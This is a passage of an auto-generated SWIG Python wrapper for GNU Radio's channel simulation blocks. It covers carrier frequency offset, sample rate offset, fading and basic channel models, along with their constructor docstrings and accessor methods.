std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.cfo_model_make(*args, **kwargs) make = staticmethod(make) def set_std_dev(self, *args, **kwargs): """set_std_dev(cfo_model self, double _dev)""" return _channels_swig.cfo_model_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(cfo_model self, double _dev)""" return _channels_swig.cfo_model_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(cfo_model self, double _rate)""" return _channels_swig.cfo_model_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(cfo_model self) -> double""" return _channels_swig.cfo_model_std_dev(self) def max_dev(self): """max_dev(cfo_model self) -> double""" return _channels_swig.cfo_model_max_dev(self) def samp_rate(self): """samp_rate(cfo_model self) -> double""" return _channels_swig.cfo_model_samp_rate(self) __swig_destroy__ = _channels_swig.delete_cfo_model __del__ = lambda self : None; cfo_model_swigregister = _channels_swig.cfo_model_swigregister cfo_model_swigregister(cfo_model) def cfo_model_make(*args, **kwargs): """ cfo_model_make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> cfo_model_sptr channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.cfo_model_make(*args, **kwargs) class dynamic_channel_model(object): """ dynamic channel simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double samp_rate, double sro_std_dev, double sro_max_dev, double cfo_std_dev, double cfo_max_dev, unsigned int N, double doppler_freq, bool LOS_model, float K, pmt_vector_float delays, pmt_vector_float mags, int ntaps_mpath, double noise_amp, double noise_seed) -> dynamic_channel_model_sptr dynamic channel simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ return _channels_swig.dynamic_channel_model_make(*args, **kwargs) make = staticmethod(make) def samp_rate(self): """samp_rate(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_samp_rate(self) def sro_dev_std(self): """sro_dev_std(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_sro_dev_std(self) def sro_dev_max(self): """sro_dev_max(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_sro_dev_max(self) def cfo_dev_std(self): """cfo_dev_std(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_cfo_dev_std(self) def cfo_dev_max(self): """cfo_dev_max(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_cfo_dev_max(self) def noise_amp(self): """noise_amp(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_noise_amp(self) def doppler_freq(self): """doppler_freq(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_doppler_freq(self) def K(self): """K(dynamic_channel_model self) -> double""" return _channels_swig.dynamic_channel_model_K(self) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_samp_rate(self, *args, **kwargs) def set_sro_dev_std(self, *args, **kwargs): """set_sro_dev_std(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_sro_dev_std(self, *args, **kwargs) def set_sro_dev_max(self, *args, **kwargs): """set_sro_dev_max(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_sro_dev_max(self, *args, **kwargs) def set_cfo_dev_std(self, *args, **kwargs): """set_cfo_dev_std(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_cfo_dev_std(self, *args, **kwargs) def set_cfo_dev_max(self, *args, **kwargs): """set_cfo_dev_max(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_cfo_dev_max(self, *args, **kwargs) def set_noise_amp(self, *args, **kwargs): """set_noise_amp(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_noise_amp(self, *args, **kwargs) def set_doppler_freq(self, *args, **kwargs): """set_doppler_freq(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_doppler_freq(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_K(self, *args, **kwargs) __swig_destroy__ = _channels_swig.delete_dynamic_channel_model __del__ = lambda self : None; dynamic_channel_model_swigregister = _channels_swig.dynamic_channel_model_swigregister dynamic_channel_model_swigregister(dynamic_channel_model) def dynamic_channel_model_make(*args, **kwargs): """ dynamic_channel_model_make(double samp_rate, double sro_std_dev, double sro_max_dev, double cfo_std_dev, double cfo_max_dev, unsigned int N, double doppler_freq, bool LOS_model, float K, pmt_vector_float delays, pmt_vector_float mags, int ntaps_mpath, double noise_amp, double noise_seed) -> dynamic_channel_model_sptr dynamic channel simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ return _channels_swig.dynamic_channel_model_make(*args, **kwargs) class fading_model(object): """ fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(unsigned int N, float fDTs=0.01, bool LOS=True, float K=4, int seed=0) -> fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ return _channels_swig.fading_model_make(*args, **kwargs) make = staticmethod(make) def fDTs(self): """fDTs(fading_model self) -> float""" return _channels_swig.fading_model_fDTs(self) def K(self): """K(fading_model self) -> float""" return _channels_swig.fading_model_K(self) def step(self): """step(fading_model self) -> float""" return _channels_swig.fading_model_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(fading_model self, float fDTs)""" return _channels_swig.fading_model_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(fading_model self, float K)""" return _channels_swig.fading_model_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(fading_model self, float step)""" return _channels_swig.fading_model_set_step(self, *args, **kwargs) __swig_destroy__ = _channels_swig.delete_fading_model __del__ = lambda self : None; fading_model_swigregister = _channels_swig.fading_model_swigregister fading_model_swigregister(fading_model) def fading_model_make(*args, **kwargs): """ fading_model_make(unsigned int N, float fDTs=0.01, bool LOS=True, float K=4, int seed=0) -> fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ return _channels_swig.fading_model_make(*args, **kwargs) class selective_fading_model(object): """ fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(unsigned int N, float fDTs, bool LOS, float K, int seed, pmt_vector_float delays, pmt_vector_float mags, int ntaps) -> selective_fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. """ return _channels_swig.selective_fading_model_make(*args, **kwargs) make = staticmethod(make) def fDTs(self): """fDTs(selective_fading_model self) -> float""" return _channels_swig.selective_fading_model_fDTs(self) def K(self): """K(selective_fading_model self) -> float""" return _channels_swig.selective_fading_model_K(self) def step(self): """step(selective_fading_model self) -> float""" return _channels_swig.selective_fading_model_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(selective_fading_model self, float fDTs)""" return _channels_swig.selective_fading_model_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(selective_fading_model self, float K)""" return _channels_swig.selective_fading_model_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(selective_fading_model self, float step)""" return _channels_swig.selective_fading_model_set_step(self, *args, **kwargs) __swig_destroy__ = _channels_swig.delete_selective_fading_model __del__ = lambda self : None; selective_fading_model_swigregister = _channels_swig.selective_fading_model_swigregister selective_fading_model_swigregister(selective_fading_model) cvar = _channels_swig.cvar default_delays = cvar.default_delays default_mags = cvar.default_mags def selective_fading_model_make(*args, **kwargs): """ selective_fading_model_make(unsigned int N, float fDTs, bool LOS, float K, int seed, pmt_vector_float delays, pmt_vector_float mags, int ntaps) -> selective_fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. """ return _channels_swig.selective_fading_model_make(*args, **kwargs) class sro_model(object): """ Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> sro_model_sptr Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.sro_model_make(*args, **kwargs) make = staticmethod(make) def set_std_dev(self, *args, **kwargs): """set_std_dev(sro_model self, double _dev)""" return _channels_swig.sro_model_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(sro_model self, double _dev)""" return _channels_swig.sro_model_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(sro_model self, double _rate)""" return _channels_swig.sro_model_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(sro_model self) -> double""" return _channels_swig.sro_model_std_dev(self) def max_dev(self): """max_dev(sro_model self) -> double""" return _channels_swig.sro_model_max_dev(self) def samp_rate(self): """samp_rate(sro_model self) -> double""" return _channels_swig.sro_model_samp_rate(self) __swig_destroy__ = _channels_swig.delete_sro_model __del__ = lambda self : None; sro_model_swigregister = _channels_swig.sro_model_swigregister sro_model_swigregister(sro_model) def sro_model_make(*args, **kwargs): """ sro_model_make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> sro_model_sptr Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.sro_model_make(*args, **kwargs) class channel_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::channel_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::channel_model)> self) -> channel_model_sptr __init__(boost::shared_ptr<(gr::channels::channel_model)> self, channel_model p) -> channel_model_sptr """ this = _channels_swig.new_channel_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(channel_model_sptr self) -> channel_model""" return _channels_swig.channel_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_channel_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(channel_model_sptr self, double noise_voltage=0.0, double frequency_offset=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model_sptr Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model_sptr_make(self, *args, **kwargs) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model_sptr self, double noise_voltage)""" return _channels_swig.channel_model_sptr_set_noise_voltage(self, *args, **kwargs) def set_frequency_offset(self, *args, **kwargs): """set_frequency_offset(channel_model_sptr self, double frequency_offset)""" return _channels_swig.channel_model_sptr_set_frequency_offset(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model_sptr self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model_sptr_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model_sptr self, double epsilon)""" return _channels_swig.channel_model_sptr_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model_sptr self) -> double""" return _channels_swig.channel_model_sptr_noise_voltage(self) def frequency_offset(self): """frequency_offset(channel_model_sptr self) -> double""" return _channels_swig.channel_model_sptr_frequency_offset(self) def taps(self): """taps(channel_model_sptr self) -> pmt_vector_cfloat""" return _channels_swig.channel_model_sptr_taps(self) def timing_offset(self): """timing_offset(channel_model_sptr self) -> double""" return _channels_swig.channel_model_sptr_timing_offset(self) def primitive_connect(self, *args): """ primitive_connect(channel_model_sptr self, basic_block_sptr block) primitive_connect(channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model_sptr_primitive_connect(self, *args) def primitive_msg_connect(self, *args): """ primitive_msg_connect(channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_connect(channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model_sptr_primitive_msg_connect(self, *args) def primitive_msg_disconnect(self, *args): """ primitive_msg_disconnect(channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_disconnect(channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model_sptr_primitive_msg_disconnect(self, *args) def primitive_disconnect(self, *args): """ primitive_disconnect(channel_model_sptr self, basic_block_sptr block) primitive_disconnect(channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model_sptr_primitive_disconnect(self, *args) def disconnect_all(self): """disconnect_all(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_disconnect_all(self) def lock(self): """lock(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_lock(self) def unlock(self): """unlock(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_unlock(self) def primitive_message_port_register_hier_in(self, *args, **kwargs): """primitive_message_port_register_hier_in(channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model_sptr_primitive_message_port_register_hier_in(self, *args, **kwargs) def primitive_message_port_register_hier_out(self, *args, **kwargs): """primitive_message_port_register_hier_out(channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model_sptr_primitive_message_port_register_hier_out(self, *args, **kwargs) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(channel_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.channel_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(channel_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.channel_model_sptr_processor_affinity(self) def to_hier_block2(self): """to_hier_block2(channel_model_sptr self) -> hier_block2_sptr""" return _channels_swig.channel_model_sptr_to_hier_block2(self) def name(self): """name(channel_model_sptr self) -> std::string""" return _channels_swig.channel_model_sptr_name(self) def symbol_name(self): """symbol_name(channel_model_sptr self) -> std::string""" return _channels_swig.channel_model_sptr_symbol_name(self) def input_signature(self): """input_signature(channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model_sptr_input_signature(self) def output_signature(self): """output_signature(channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model_sptr_output_signature(self) def unique_id(self): """unique_id(channel_model_sptr self) -> long""" return _channels_swig.channel_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(channel_model_sptr self) -> basic_block_sptr""" return _channels_swig.channel_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(channel_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.channel_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(channel_model_sptr self) -> std::string""" return _channels_swig.channel_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(channel_model_sptr self, std::string name)""" return _channels_swig.channel_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(channel_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.channel_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(channel_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.channel_model_sptr_message_subscribers(self, *args, **kwargs) channel_model_sptr_swigregister = _channels_swig.channel_model_sptr_swigregister channel_model_sptr_swigregister(channel_model_sptr) channel_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) channel_model = channel_model.make; class channel_model2_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::channel_model2)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::channel_model2)> self) -> channel_model2_sptr __init__(boost::shared_ptr<(gr::channels::channel_model2)> self, channel_model2 p) -> channel_model2_sptr """ this = _channels_swig.new_channel_model2_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(channel_model2_sptr self) -> channel_model2""" return _channels_swig.channel_model2_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_channel_model2_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(channel_model2_sptr self, double noise_voltage=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model2_sptr Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. """ return _channels_swig.channel_model2_sptr_make(self, *args, **kwargs) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model2_sptr self, double noise_voltage)""" return _channels_swig.channel_model2_sptr_set_noise_voltage(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model2_sptr self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model2_sptr_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model2_sptr self, double epsilon)""" return _channels_swig.channel_model2_sptr_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model2_sptr self) -> double""" return _channels_swig.channel_model2_sptr_noise_voltage(self) def taps(self): """taps(channel_model2_sptr self) -> pmt_vector_cfloat""" return _channels_swig.channel_model2_sptr_taps(self) def timing_offset(self): """timing_offset(channel_model2_sptr self) -> double""" return _channels_swig.channel_model2_sptr_timing_offset(self) def primitive_connect(self, *args): """ primitive_connect(channel_model2_sptr self, basic_block_sptr block) primitive_connect(channel_model2_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model2_sptr_primitive_connect(self, *args) def primitive_msg_connect(self, *args): """ primitive_msg_connect(channel_model2_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_connect(channel_model2_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model2_sptr_primitive_msg_connect(self, *args) def primitive_msg_disconnect(self, *args): """ primitive_msg_disconnect(channel_model2_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_disconnect(channel_model2_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model2_sptr_primitive_msg_disconnect(self, *args) def primitive_disconnect(self, *args): """ primitive_disconnect(channel_model2_sptr self, basic_block_sptr block) primitive_disconnect(channel_model2_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model2_sptr_primitive_disconnect(self, *args) def disconnect_all(self): """disconnect_all(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_disconnect_all(self) def lock(self): """lock(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_lock(self) def unlock(self): """unlock(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_unlock(self) def primitive_message_port_register_hier_in(self, *args, **kwargs): """primitive_message_port_register_hier_in(channel_model2_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model2_sptr_primitive_message_port_register_hier_in(self, *args, **kwargs) def primitive_message_port_register_hier_out(self, *args, **kwargs): """primitive_message_port_register_hier_out(channel_model2_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model2_sptr_primitive_message_port_register_hier_out(self, *args, **kwargs) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(channel_model2_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.channel_model2_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(channel_model2_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.channel_model2_sptr_processor_affinity(self) def to_hier_block2(self): """to_hier_block2(channel_model2_sptr self) -> hier_block2_sptr""" return _channels_swig.channel_model2_sptr_to_hier_block2(self) def name(self): """name(channel_model2_sptr self) -> std::string""" return 